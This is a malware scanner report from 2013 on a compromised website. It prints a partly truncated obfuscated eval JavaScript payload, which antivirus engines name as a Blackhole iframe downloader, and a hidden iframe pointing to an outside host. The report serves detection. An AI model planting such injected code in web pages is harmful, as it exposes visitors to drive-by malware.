Online Malware Scanner report for 61.126.36.211

New scan:

61.126.36.211

(cached results from Mon Jul 15 07:31:01 2013 rescan)

Website Malware
Cleaning & Monitoring

Malware cleaning service from eVuln team.

  • Website cleaning
  • Redirects removal
  • Log files inspection
  • Reason eliminating
  • Blacklists removal
  • One year monitoring
  • Repeated fixing

website(s)

$119.00

Malicious/Suspicious/Total urls checked
1/0/2
1 page has malicious code. See details below
Blacklists
OK
Malicious redirects
OK
Malicious/Hidden/Total iFrames
0/1/1
1 suspicious iframe found. See details below
Deface / Content modification
OK

Setup daily monitoring of 61.126.36.211

Paste the following HTML code anywhere into "61.126.36.211" website.

eVuln.com

Scanned pages/files

RequestServer responseStatus
http://61.126.36.211/
200 OK
Content-Length: 6409
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_71_6f_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_71_6f_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7c_77_76_6d_7a_7b_70_77_78_36_6b_77_75_37_6d_7b_6c_36_78_70_78_2f_43_15_12_28_71_6f_36_7b_7c_81_74_6d_36_78_
... 3138 bytes are skipped ...
12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}

Antivirus reports:

AntiVir
JS/BlacoleRef.CZ.29
Avast
JS:Decode-AQB [Trj]
Emsisoft
Trojan.JS.Agent.JBT (B)
CAT-QuickHeal
JS/Iframe.DEG
DrWeb
JS.IFrame.457
Kaspersky
Trojan-Downloader.JS.Iframe.deg
Fortinet
JS/Iframe.DDG!tr.dldr
NANO-Antivirus
Trojan.Script.Expack.bvtkmp
Norman
Blacole.UC
GData
Trojan.JS.Agent.JBT
BitDefender
Trojan.JS.Agent.JBT

Hidden iFrame found.
size: 10x10     style: hidden
src: http://www.metodobaran.com/counter.php

<iframe src="http://www.metodobaran.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

http://61.126.36.211/test404page.js
404 Not Found
Content-Length: 208
Content-Type: text/html
clean

Malicious redirects

First query (normal visit):
GET / HTTP/1.1
Host: 61.126.36.211

Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Jul 2013 04:31:01 GMT
Accept-Ranges: bytes
ETag: "ee71f0-1909-51c5b937"
Server: Rapidsite/Apa
Content-Length: 6409
Content-Type: text/html
Last-Modified: Sat, 22 Jun 2013 14:48:23 GMT

...6409 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 61.126.36.211
Referer: http://www.google.com/search?q=61.126.36.211

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=61.126.36.211

Result: This site is not currently listed as suspicious.
Query: http://yandex.ru/infected?l10n=en&url=http://61.126.36.211/

Result: 61.126.36.211 is not infected or malware details are not published yet.
Infected sites found